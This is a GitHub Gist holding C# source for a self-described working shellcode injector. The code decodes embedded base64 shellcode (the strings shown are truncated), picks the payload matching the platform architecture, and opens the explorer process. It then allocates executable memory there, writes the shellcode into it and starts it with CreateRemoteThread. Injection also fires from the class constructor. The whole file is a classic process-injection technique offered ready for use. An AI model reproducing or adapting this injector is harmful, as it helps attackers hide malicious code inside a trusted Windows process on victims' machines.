Created
January 16, 2019 16:01
-
-
Save TheWover/1d3f3f5c67d8a9928e9116c8fb2c6b73 to your computer and use it in GitHub Desktop.
Dirty but working C# remote shell code injector. Injects into explorer using the architecture of the platform. Modified from several random sources and cleaned up a bit.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest | |
| { | |
| public class Program | |
| { | |
| static string x64 = @"/OjBA...v/V"; | |
| static string x86 = @"/OmKA...=="; | |
| static string target = "explorer"; | |
| static void Main(string[] args) | |
| { | |
| Inject(x86, x64, target); | |
| } | |
| public Program() | |
| { | |
| Inject(x86, x64, target); | |
| } | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); | |
| [DllImport("kernel32.dll", CharSet = CharSet.Auto)] | |
| public static extern IntPtr GetModuleHandle(string lpModuleName); | |
| [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] | |
| static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
| static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, | |
| uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); | |
| [DllImport("kernel32.dll")] | |
| static extern IntPtr CreateRemoteThread(IntPtr hProcess, | |
| IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
| const int PROCESS_CREATE_THREAD = 0x0002; | |
| const int PROCESS_QUERY_INFORMATION = 0x0400; | |
| const int PROCESS_VM_OPERATION = 0x0008; | |
| const int PROCESS_VM_WRITE = 0x0020; | |
| const int PROCESS_VM_READ = 0x0010; | |
| const uint MEM_COMMIT = 0x00001000; | |
| const uint MEM_RESERVE = 0x00002000; | |
| const uint PAGE_READWRITE = 4; | |
| const uint PAGE_EXECUTE_READWRITE = 0x40; | |
| public static int Inject(string x86, string x64, string procName) | |
| { | |
| string s; | |
| if (IntPtr.Size == 4) | |
| { | |
| s = x86; | |
| } | |
| else | |
| { | |
| s = x64; | |
| } | |
| byte[] shellcode = Convert.FromBase64String(s); | |
| Process targetProcess = Process.GetProcessesByName(procName)[0]; | |
| Console.WriteLine(targetProcess.Id); | |
| IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); | |
| IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
| UIntPtr bytesWritten; | |
| WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)shellcode.Length, out bytesWritten); | |
| CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero, 0, IntPtr.Zero); | |
| return 0; | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment